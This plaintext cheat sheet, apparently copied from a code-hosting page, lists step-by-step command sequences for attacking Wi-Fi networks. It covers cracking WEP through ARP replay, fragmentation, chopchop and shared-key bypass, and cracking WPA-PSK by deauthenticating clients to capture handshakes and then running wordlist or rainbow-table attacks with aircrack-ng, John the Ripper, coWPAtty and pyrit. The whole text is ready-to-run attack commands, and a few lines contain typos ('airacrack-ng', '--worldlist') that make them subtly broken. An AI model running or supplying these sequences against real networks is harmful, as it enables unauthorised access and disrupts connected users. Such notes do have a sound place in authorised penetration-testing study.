76 lines
3.4 KiB
Plaintext
76 lines
3.4 KiB
Plaintext
|
# cracking WEP with clients
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
|
||
|
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
|
||
|
aircrack-ng -0 $CAP_FILE
|
||
|
|
||
|
|
||
|
# cracking WEP via a client
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth
|
||
|
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack
|
||
|
aircrack-ng -0 -z -n 64 $CAP_FILE
|
||
|
|
||
|
|
||
|
# clientless WEP cracking
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
|
||
|
aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA
|
||
|
aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA
|
||
|
packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA
|
||
|
aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet
|
||
|
aircrack-ng -0 $CAP_FILE
|
||
|
|
||
|
|
||
|
# bypassing WEP SKA
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file
|
||
|
aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack
|
||
|
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
|
||
|
aircrack-ng -0 -z -n 64 $CAP_FILE
|
||
|
|
||
|
|
||
|
# cracking WPA PSK
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
|
||
|
airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
|
||
|
|
||
|
|
||
|
# cracking WPA with John The Ripper
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
|
||
|
# change to password folder
|
||
|
vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
|
||
|
./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
|
||
|
|
||
|
|
||
|
# cracking WPA with coWPAtty
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
|
||
|
cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
|
||
|
genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
|
||
|
cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
|
||
|
|
||
|
|
||
|
# cracking WPA with pyrit
|
||
|
airmon-ng start wlan0 $AP_CHANNEL
|
||
|
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
|
||
|
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
|
||
|
pyrit list_cores
|
||
|
pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
|
||
|
|
||
|
pyrit -i $WORDLIST import_password # Import the wordlist to the database
|
||
|
pyrit -e $AP_ESSID create_essid # Add ESSID to the database
|
||
|
pyrit batch
|
||
|
pyrit -r $CAPTURE_FILE attack_db
|
||
|
|